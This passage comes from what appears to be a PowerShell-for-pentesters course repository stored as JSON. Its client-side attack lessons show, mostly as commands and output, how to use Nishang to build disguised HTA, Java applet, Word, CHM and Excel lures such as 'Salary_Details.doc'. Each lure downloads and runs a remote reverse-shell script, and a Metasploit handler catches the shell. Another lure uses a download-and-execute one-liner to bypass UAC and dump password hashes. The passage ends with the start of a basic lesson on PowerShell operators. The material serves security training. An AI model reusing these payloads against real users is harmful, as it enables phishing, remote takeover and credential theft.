none)\n\t LHOST 10.0.0.206 yes The listen address\n\t LPORT 4444 yes The listen port\n\t\n\t\n\tExploit target:\n\t\n\t Id Name\n\t -- ----\n\t 0 Wildcard Target\n\t\n\t\n\tmsf exploit(handler) > exploit\n\t\n\t[*] Started reverse TCP handler on 10.0.0.206:4444\n\t[*] Starting the payload handler...\n\t[*] Encoded stage with x86/shikata_ga_nai\n\t[*] Sending encoded stage (267 bytes) to 10.0.0.233\n\t[*] Command shell session 2 opened (10.0.0.206:4444 -> 10.0.0.233:16820) at 2017-07-17 18:21:50 -0400\n\t\n\t\n\twhoami\n\tpfpt\\administrator\n\t```\n\t\n\t![Image of Target](images/18.jpeg)" }, { "path": "48-Client-Side-Attacks-Part-3.md", "content": "#### 48. Client Side Attacks Part 3\n\n###### Phishing/Drive-by-download\n\n- Out-HTA\n- Out-Java\n\n - Out-HTA\n\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Import-Module .\\nishang.psm1\n\tWARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module\n\tcommand again with the Verbose parameter. For a list of approved verbs, type Get-Verb.\n\tWARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \\ $ ^ ; : \" ' < > | ? @ ` * % + = ~\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Help Out-HTA -Examples\n\t\n\tNAME\n\t Out-HTA\n\t\n\tSYNOPSIS\n\t Nishang script which could be used for generating \"infected\" HTML Application. It could be deployed on\n\t a web server and PowerShell scripts and commands could be executed on the target machine.\n\t\n\t -------------------------- EXAMPLE 1 --------------------------\n\t\n\t PS >Out-HTA -Payload \"powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem\"\n\t\n\t\n\t Above command would execute Get-ChildItem on the target machine when the HTA is opened.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 2 --------------------------\n\t\n\t PS >Out-HTA -PayloadURL http://192.168.254.1/Get-Information.ps1\n\t\n\t\n\t Use above command to generate HTA and VBS files which download and execute the given powershell script in memory on target.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 3 --------------------------\n\t\n\t PS >Out-HTA -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM\n\t\n\t\n\t Use above command to pass an argument to the PowerShell script/module.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 4 --------------------------\n\t\n\t PS >Out-HTA -PayloadScript C:\\nishang\\Shells\\Invoke-PowerShellTcpOneLine.ps1\n\t\n\t\n\t Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it,\n\t you must pass the parameters in the script itself.\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t[```mini-reverse.ps1```](https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5)\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Out-HTA -PayloadURL http://10.0.0.233/mini-reverse.ps1\n\tHTA written to C:\\Users\\Administrator\\Desktop\\nishang-master\\WindDef_WebInstall.hta.\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> ls .\\WindDef_WebInstall.hta\n\t\n\t\n\t Directory: C:\\Users\\Administrator\\Desktop\\nishang-master\n\t\n\t\n\tMode LastWriteTime Length Name\n\t---- ------------- ------ ----\n\t-a--- 7/17/2017 3:35 PM 1968 WindDef_WebInstall.hta\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\tRun ```WindDef_WebInstall.hta```\n\t\n\t```sh\n\troot@kali:~# msfconsole\n\tmsf > use exploit/multi/handler\n\tmsf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp\n\tPAYLOAD => windows/shell/reverse_tcp\n\tmsf exploit(handler) > set LHOST 10.0.0.206\n\tLHOST => 10.0.0.206\n\tmsf exploit(handler) > set LPORT 4444\n\tLPORT => 4444\n\tmsf exploit(handler) > show options\n\t\n\tModule options (exploit/multi/handler):\n\t \n\t Name Current Setting Required Description\n\t ---- --------------- -------- -----------\n\t \n\tPayload options (windows/shell/reverse_tcp):\n\t \n\t Name Current Setting Required Description\n\t ---- --------------- -------- -----------\n\t EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)\n\t LHOST 10.0.0.206 yes The listen address\n\t LPORT 4444 yes The listen port\n\t \n\tExploit target:\n\t \n\t Id Name\n\t -- ----\n\t 0 Wildcard Target\n\t \n\t\n\tmsf exploit(handler) > exploit\n\t\n\t[*] Started reverse TCP handler on 10.0.0.206:4444\n\t[*] Starting the payload handler...\n\t[*] Encoded stage with x86/shikata_ga_nai\n\t[*] Sending encoded stage (267 bytes) to 10.0.0.233\n\t[*] Command shell session 4 opened (10.0.0.206:4444 -> 10.0.0.233:16894) at 2017-07-17 18:39:08 -0400\n\t\n\twhoami\n\tpfpt\\administrator\n\t```\n\n - Out-Java\n\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Help Out-Java -Examples\n\t\n\tNAME\n\t Out-Java\n\t\n\tSYNOPSIS\n\t Nishang script which could be used for generating JAR to be used for applets.\n\t\n\t -------------------------- EXAMPLE 1 --------------------------\n\t\n\t PS >Out-Java -Payload \"Get-Process\" -JDKPath \"C:\\Program Files\\Java\\jdk1.7.0_25\"\n\t\n\t\n\t Above command would execute Get-Process on the target machine when the JAR or Class file is executed.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 2 --------------------------\n\t\n\t PS >Out-Java -PayloadURL http://192.168.254.1/Get-Information.ps1 -JDKPath \"C:\\Program Files\\Java\\jdk1.7.0_25\"\n\t\n\t\n\t Use above command to generate JAR which download and execute the given powershell script in memory on target.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 3 --------------------------\n\t\n\t PS >Out-Java -Payload \"-e \" -JDKPath \"C:\\Program Files\\Java\\jdk1.7.0_25\"\n\t\n\t\n\t Use above command to generate JAR which executes the encoded script.\n\t Use Invoke-Command from Nishang to encode the script.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 4 --------------------------\n\t\n\t PS >Out-Java -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -JDKPath \"C:\\Program Files\\Java\\jdk1.7.0_25\"\n\t\n\t\n\t Use above command to pass an argument to the powershell script/module.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 5 --------------------------\n\t\n\t PS >Out-Java -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -JDKPath \"C:\\Program Files\\Java\\jdk1.7.0_25\" -NoSelfSign\n\t\n\t\n\t Due to the use of -NoSelfSign in above command, no self signed certificate would be used to sign th JAR.\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t[```mini-reverse.ps1```](https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5)\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Out-Java -PayloadURL http://10.0.0.233/mini-reverse.ps1 -JDKPath 'C:\\Program Files\\Java\\jdk1.8.0_131'\n\tadded manifest\n\tadding: JavaPS.class(in = 1156) (out= 688)(deflated 40%)\n\tjar signed.\n\t\n\tWarning:\n\tThe signer certificate will expire within six months.\n\tNo -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2017-10-15) or after any f\n\tuture revocation date.\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> ls .\\applet.html\n\t\n\t\n\t Directory: C:\\Users\\Administrator\\Desktop\\nishang-master\n\t\n\t\n\tMode LastWriteTime Length Name\n\t---- ------------- ------ ----\n\t-a--- 7/17/2017 3:55 PM 253 applet.html\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> ls .\\SignedJavaPS.jar\n\t\n\t\n\t Directory: C:\\Users\\Administrator\\Desktop\\nishang-master\n\t\n\t\n\tMode LastWriteTime Length Name\n\t---- ------------- ------ ----\n\t-a--- 7/17/2017 3:55 PM 2598 SignedJavaPS.jar\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\tRun ```applet.html```\n\t\n\t```sh\n\troot@kali:~# msfconsole\n\tmsf > use exploit/multi/handler\n\tmsf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp\n\tPAYLOAD => windows/shell/reverse_tcp\n\tmsf exploit(handler) > set LHOST 10.0.0.206\n\tLHOST => 10.0.0.206\n\tmsf exploit(handler) > set LPORT 4444\n\tLPORT => 4444\n\tmsf exploit(handler) > show options\n\t\n\tModule options (exploit/multi/handler):\n\t\n\t Name Current Setting Required Description\n\t ---- --------------- -------- -----------\n\t\n\t\n\tPayload options (windows/shell/reverse_tcp):\n\t\n\t Name Current Setting Required Description\n\t ---- --------------- -------- -----------\n\t EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)\n\t LHOST 10.0.0.206 yes The listen address\n\t LPORT 4444 yes The listen port\n\t\n\t\n\tExploit target:\n\t\n\t Id Name\n\t -- ----\n\t 0 Wildcard Target\n\t\n\t\n\tmsf exploit(handler) > exploit\n\t\n\t[*] Started reverse TCP handler on 10.0.0.206:4444\n\t[*] Starting the payload handler...\n\t[*] Encoded stage with x86/shikata_ga_nai\n\t[*] Sending encoded stage (267 bytes) to 10.0.0.233\n\t[*] Command shell session 1 opened (10.0.0.206:4444 -> 10.0.0.233:51162) at 2017-07-17 17:13:28 -0400\n\t\n\twhoami\n\tpfpt\\administrator\n\t```\n" }, { "path": "49-Client-Side-Attacks-Part-4.md", "content": "#### 49. Client Side Attacks Part 4\n\n###### Using Modules\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Import-Module .\\nishang.psm1\nWARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module\ncommand again with the Verbose parameter. For a list of approved verbs, type Get-Verb.\nWARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \\ $ ^ ; : \" ' < > | ? @ ` * % + = ~\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Out-Word -PayloadURL http://10.0.0.233/Powerpreter.psm1 -Arguments Get-Information\nSaved to file C:\\Users\\Administrator\\Desktop\\nishang-master\\Salary_Details.doc\n0\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> ls .\\Salary_Details.doc\n\n\n Directory: C:\\Users\\Administrator\\Desktop\\nishang-master\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\n-a--- 7/17/2017 4:22 PM 28672 Salary_Details.doc\n\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\nRun ```Salary_Details.doc```\n\nView → Macros → View Macros → Document_Open → Edit\n\n![Image of Doc](images/19.jpeg)\n\n###### Using another client side attack from a client side attack\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Import-Module .\\nishang.psm1\nWARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module\ncommand again with the Verbose parameter. For a list of approved verbs, type Get-Verb.\nWARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \\ $ ^ ; : \" ' < > | ? @ ` * % + = ~\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n[```Out-ShortcutModified.ps1```](https://github.com/Kan1shka9/PowerShell-for-Pentesters/blob/master/Code/49/Out-ShortcutModified.ps1)\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Invoke-Encode -DataToEncode .\\Client\\Out-ShortcutModified.ps1 -OutCommand\nEncoded data written to .\\encoded.txt\nEncoded command written to .\\encodedcommand.txt\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> cat .\\encodedcommand.txt\nSQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALg\nBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAo\nACcAbgBWAFYAYgBiADUAcwB3AEYASAA2AFAAbABQAC8AZwBvAFUAaQBBAEYATQBoAHQAMwBhAFIATwBlAFYAagBUAFYAcQB2AGEAdABXAGkAMAB5AHEAUwBtAEQAdwA2AGMAQgBLADkAZwBJADkAdQA1AG8ASwByAC8AZgBUAGEAWABoAHQARgBKAHkAdwBBAEoAWAA4AD\ncAeAArAFkANwBQADkAOQBtAHMATgBqAFMAUQBoAEYARgAwAHQANQBHAE8ASAB6AEUAdQBnADQAMwBzAGQAbAA2ADYAbgBXADQASABxAGUAZAB4AGwAbwBRAHgAeQBEAE4AQwBRADAATABYAGwAdgAyAEUAUABNAHgAeABZAGgAVgBXAC8AUgB4ADYAagA3AGsASgBKAEgA\nRABMAFkANABMAGsAWQBhAGQAbwAyAEUAZgBmAE0AUQAyAHgAWgBEAHgAVAB3ADkANABsAGoAZwBYAFkAVAA3AFYAbAB2AHUAUQBxAGQAbQAyAG0AZAA3AEUASABsAFEAWgBlAHgAcQBCAFcARwBMAFAAVAB4AFYAegBoAHMANQAxAFkAKwBKAG0AUQBrAEUAegBHADEAWQ\nBUAEgAZABzAEQAOQBDAE8ASgA0AHMAUgAyADUAdwAwAFcAcQB4ADAASwBQAFgAZABpAEQAMABUADgAKwB6AFYARwBMAE4ARAAyAGMAeABRAHkASAAvADQARQB5AGIAbwAvAHkAOABPAE8AbQBYADcARgB5AEQATgBTAGsAQgBkAFIAWAB2AHQANABrAFEASwBYADQAQQAr\nAG4AdgA4AFQAKwAyAGkASwA5AEUAbABtADYAawBoADIAVwBrAGUAZQAyAGwAdQAzAEIAUgBhAFEANQBKAGgAaQA2AEoASQB0AHcASAB2AGcAWAB1AHgAdgBUAFoATwBDAEsATABrAHgAWgBaAGYARwBQAHkARwByAFMAMwBlAFgAbABpADUAaABqAC8AUQB2AG4AVQBBAH\nUAVQBxAFkASABSAHEAdwBqADYATgBHAFYAZgA3AFUAWABJADAAQwA2AGcASwB6AGkANABhAHMAcgBJACsAVgBCAHkAWABVAHkALwB2ADIAZABmADEAUQBrADYAaABlAGwAOQBtAHEAawA0AFIAQwBVAE8AZwB5AEMAbgBPAGkAcwByAFQAWQB6AEUASgBNAG4AUwBXAHAA\nVgBnAEkANQBGAEEAVwBzAHoAWABUAGIAYwByAFoAUwBsAGYAVwBDAGQARABWAHgAVQA5AGsAVwBiAGUAdwBjACsANgBXAHYAeQBDAFEANgBCAGEAawBPADQAZgBsAEwAQwBhAEsAZAB0AHMAOQBaAHoAdQBxADQAWQByAHQAVwBHAFoATgBmAEsAWgB0AGYAegBrAEkAeA\nBDAGgAUwBmAEMAMgBhADMAbAB4AEUAKwBTAGwAVQBhAGQAYQBDAE8AdwBGAEwAeQB1ADcAYwBEAHoAaABKAHAAWgB0ADcAbABZAHYAZQBxAEoAOABlAEEAcgBnAHoARABsAGgAQwBaAGIASgBxAGsAcgBFAGIAeQA5AHgANwB6AE4AZABRAHEAYQBsADIAWgB6AFQAOQB6\nAGsASABrADQAQQBXAFgAUgBsADEAeAA1AFQAVwBDAEgAbABKAEYATABxAEEAWgBTAHgATABGAGMAMAB3AG8ARwBNADAAbwA5AGQAcABQADAAZQBlAG0AVwBZAG4AcQBPAFIAZABWAEsAYQArAG0AWABjAHYAaABoAGcAVwA0AHkAaQBMAFgAUgAzAC8ANABEAHUAYQB0AH\ncAagBwAFUAVwBmADIAbQBqADQAKwAzAFkASgBYAGwAbQBIAE0AaQB3AFMAbQBxAGgASQB6ADcAUwBCADIAZwBhAG4AOAA1ADYAUgBFAFcAYQBBAGwASwBLAEQAdgBsAEsARgBXAHIAeAByAFcAaQBHAGwAcQBOAHIALwBwAFQALwB3AEUAZwA1ADgAQQA3AGkAcQBSAE0A\nVAB3AGUARAAwAGQARABWADcAMwBnAHkARwBTAFMARQBFAG8AZQBEAE8AcQBZAEMAMwBGAFMATQB1AHAAMwBmACcAKQApACkAKQAsACAAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYw\nBvAG0AcAByAGUAcwBzACkAKQAsACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Out-CHM -Payload \" -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAA\noAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAE\nMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAbgBWAFYAYgBiADUAcwB3AEYASAA2AFAAbABQAC8AZwBvAFUAaQBBAEYATQBoAHQAMwBhAFIATwBlAFYAagBUAFYAcQB2AGEAdABXAGkAMAB5AHEAUwBtAEQAdwA2AGMAQ\ngBLADkAZwBJADkAdQA1AG8ASwByAC8AZgBUAGEAWABoAHQARgBKAHkAdwBBAEoAWAA4ADcAeAArAFkANwBQADkAOQBtAHMATgBqAFMAUQBoAEYARgAwAHQANQBHAE8ASAB6AEUAdQBnADQAMwBzAGQAbAA2ADYAbgBXADQASABxAGUAZAB4AGwAbwBRAHgAeQBEAE4AQwBR\nADAATABYAGwAdgAyAEUAUABNAHgAeABZAGgAVgBXAC8AUgB4ADYAagA3AGsASgBKAEgARABMAFkANABMAGsAWQBhAGQAbwAyAEUAZgBmAE0AUQAyAHgAWgBEAHgAVAB3ADkANABsAGoAZwBYAFkAVAA3AFYAbAB2AHUAUQBxAGQAbQAyAG0AZAA3AEUASABsAFEAWgBlAHg\nAcQBCAFcARwBMAFAAVAB4AFYAegBoAHMANQAxAFkAKwBKAG0AUQBrAEUAegBHADEAWQBUAEgAZABzAEQAOQBDAE8ASgA0AHMAUgAyADUAdwAwAFcAcQB4ADAASwBQAFgAZABpAEQAMABUADgAKwB6AFYARwBMAE4ARAAyAGMAeABRAHkASAAvADQARQB5AGIAbwAvAHkAOA\nBPAE8AbQBYADcARgB5AEQATgBTAGsAQgBkAFIAWAB2AHQANABrAFEASwBYADQAQQArAG4AdgA4AFQAKwAyAGkASwA5AEUAbABtADYAawBoADIAVwBrAGUAZQAyAGwAdQAzAEIAUgBhAFEANQBKAGgAaQA2AEoASQB0AHcASAB2AGcAWAB1AHgAdgBUAFoATwBDAEsATABrA\nHgAWgBaAGYARwBQAHkARwByAFMAMwBlAFgAbABpADUAaABqAC8AUQB2AG4AVQBBAHUAVQBxAFkASABSAHEAdwBqADYATgBHAFYAZgA3AFUAWABJADAAQwA2AGcASwB6AGkANABhAHMAcgBJACsAVgBCAHkAWABVAHkALwB2ADIAZABmADEAUQBrADYAaABlAGwAOQBtAHEA\nawA0AFIAQwBVAE8AZwB5AEMAbgBPAGkAcwByAFQAWQB6AEUASgBNAG4AUwBXAHAAVgBnAEkANQBGAEEAVwBzAHoAWABUAGIAYwByAFoAUwBsAGYAVwBDAGQARABWAHgAVQA5AGsAVwBiAGUAdwBjACsANgBXAHYAeQBDAFEANgBCAGEAawBPADQAZgBsAEwAQwBhAEsAZAB\n0AHMAOQBaAHoAdQBxADQAWQByAHQAVwBHAFoATgBmAEsAWgB0AGYAegBrAEkAeABDAGgAUwBmAEMAMgBhADMAbAB4AEUAKwBTAGwAVQBhAGQAYQBDAE8AdwBGAEwAeQB1ADcAYwBEAHoAaABKAHAAWgB0ADcAbABZAHYAZQBxAEoAOABlAEEAcgBnAHoARABsAGgAQwBaAG\nIASgBxAGsAcgBFAGIAeQA5AHgANwB6AE4AZABRAHEAYQBsADIAWgB6AFQAOQB6AGsASABrADQAQQBXAFgAUgBsADEAeAA1AFQAVwBDAEgAbABKAEYATABxAEEAWgBTAHgATABGAGMAMAB3AG8ARwBNADAAbwA5AGQAcABQADAAZQBlAG0AVwBZAG4AcQBPAFIAZABWAEsAY\nQArAG0AWABjAHYAaABoAGcAVwA0AHkAaQBMAFgAUgAzAC8ANABEAHUAYQB0AHcAagBwAFUAVwBmADIAbQBqADQAKwAzAFkASgBYAGwAbQBIAE0AaQB3AFMAbQBxAGgASQB6ADcAUwBCADIAZwBhAG4AOAA1ADYAUgBFAFcAYQBBAGwASwBLAEQAdgBsAEsARgBXAHIAeABy\nAFcAaQBHAGwAcQBOAHIALwBwAFQALwB3AEUAZwA1ADgAQQA3AGkAcQBSAE0AVAB3AGUARAAwAGQARABWADcAMwBnAHkARwBTAFMARQBFAG8AZQBEAE8AcQBZAEMAMwBGAFMATQB1AHAAMwBmACcAKQApACkAKQAsACAAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4\nALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQAsACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=\" -HHCPath 'C:\n\\Program Files (x86)\\HTML Help Workshop'\nMicrosoft HTML Help Compiler 4.74.8702\n\nCompiling c:\\Users\\Administrator\\Desktop\\nishang-master\\doc.chm\n\n\nCompile time: 0 minutes, 0 seconds\n2 Topics\n4 Local links\n4 Internet links\n0 Graphics\n\n\nCreated c:\\Users\\Administrator\\Desktop\\nishang-master\\doc.chm, 14,838 bytes\nCompression decreased file by 1,046 bytes.\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> ls .\\doc.chm\n\n\n Directory: C:\\Users\\Administrator\\Desktop\\nishang-master\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\n-a--- 7/17/2017 4:43 PM 14838 doc.chm\n\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\nRunning ```doc.chm``` will produce a ```Shortcut to File Server.lnk```\n\n```PowerShell\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> ls '.\\Shortcut to File Server.lnk'\n\n\n Directory: C:\\Users\\Administrator\\Desktop\\nishang-master\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\n-a--- 7/17/2017 4:43 PM 1534 Shortcut to File Server.lnk\n\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n\n![Image of Shortcut](images/20.jpeg)\n\nRun ```Shortcut to File Server.lnk```\n\n```sh\nroot@kali:~# msfconsole\nmsf > use exploit/multi/handler\nmsf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp\nPAYLOAD => windows/shell/reverse_tcp\nmsf exploit(handler) > set LHOST 10.0.0.206\nLHOST => 10.0.0.206\nmsf exploit(handler) > set LPORT 4444\nLPORT => 4444\nmsf exploit(handler) > show options\n\nModule options (exploit/multi/handler):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n\n\nPayload options (windows/shell/reverse_tcp):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)\n LHOST 10.0.0.206 yes The listen address\n LPORT 4444 yes The listen port\n\n\nExploit target:\n\n Id Name\n -- ----\n 0 Wildcard Target\n\n\nmsf exploit(handler) > exploit\n\n[*] Started reverse TCP handler on 10.0.0.206:4444\n[*] Starting the payload handler...\n[*] Encoded stage with x86/shikata_ga_nai\n[*] Sending encoded stage (267 bytes) to 10.0.0.233\n[*] Command shell session 1 opened (10.0.0.206:4444 -> 10.0.0.233:17394) at 2017-07-17 19:43:33 -0400\n\nwhoami\npfpt\\administrator\n```\n\n###### Running PowerShell scripts with elevation\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Out-Excel -Payload \"powershell.exe Start-Process -FilePath powershell.exe -ArgumentList ''-noexit -c IEX ((New-Object Net.WebClient).DownloadString(''''h\nttp://10.0.0.233/Get-PassHashes.ps1''''));Get-PassHashes'' -Verb runas\"\nSaved to file C:\\Users\\Administrator\\Desktop\\nishang-master\\Salary_Details.xls\n0\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> ls .\\Salary_Details.xls\n\n\n Directory: C:\\Users\\Administrator\\Desktop\\nishang-master\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\n-a--- 7/17/2017 5:14 PM 29696 Salary_Details.xls\n\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\nRun ```Salary_Details.xls```, Bypass ```UAC``` and hashed for all users will be displayed in ```cmd```\n\n###### Reads\n\n- [Using PowerShell for Client Side Attacks](http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html)\n- [DELIVERING A POWERSHELL PAYLOAD IN A CLIENT-SIDE ATTACK](https://enigma0x3.net/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/)" }, { "path": "5-Operators.md", "content": "#### 5. Operators\r\n\r\n- Arithmetic (```+, -, *, /, %```)\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> 4+7\r\n11\r\nPS C:\\Users\\Windows-32> 5/3\r\n1.66666666666667\r\nPS C:\\Users\\Windows-32> 3-6\r\n-3\r\nPS C:\\Users\\Windows-32> 7*4\r\n28\r\nPS C:\\Users\\Windows-32> 16%9\r\n7\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> \"Hello\" + \" World\"\r\nHello World\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> \"Hello\" + 5\r\nHello5\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> 5 + \"Hello\"\r\nCannot convert value \"Hello\" to type \"System.Int32\". Error: \"Input string was not in a correct format.\"\r\nAt line:1 char:4\r\n+ 5 + <<<< \"Hello\"\r\n + CategoryInfo : NotSpecified: (:) [], RuntimeException\r\n + FullyQualifiedErrorId : RuntimeException\r\n\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n- Assignment (```=, +=, -=, *=, /=, %=```)\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> $a = 4\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> $a *= 6\r\nPS C:\\Users\\Windows-32> $a\r\n24\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> $a += 4\r\nPS C:\\Users\\Windows-32> $a\r\n28\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> $a -= 10\r\nPS C:\\Users\\Windows-32> $a\r\n18\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> $a /= 4\r\nPS C:\\Users\\Windows-32> $a\r\n4.5\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> $a %= 2\r\nPS C:\\Users\\Windows-32> $a\r\n0.5\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n- Comparison (```-eq, -ne, -gt, -lt, -le, -ge, -match, -notmatch, -replace, -like, -notlike, -in, -notin, -contains, -notcontains```)\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> 6 -eq 5\r\nFalse\r\nPS C:\\Users\\Windows-32> 5 -eq 5\r\nTrue\r\nPS C:\\Users\\Windows-32>\r\n```\r\n\r\n```PowerShell\r\nPS 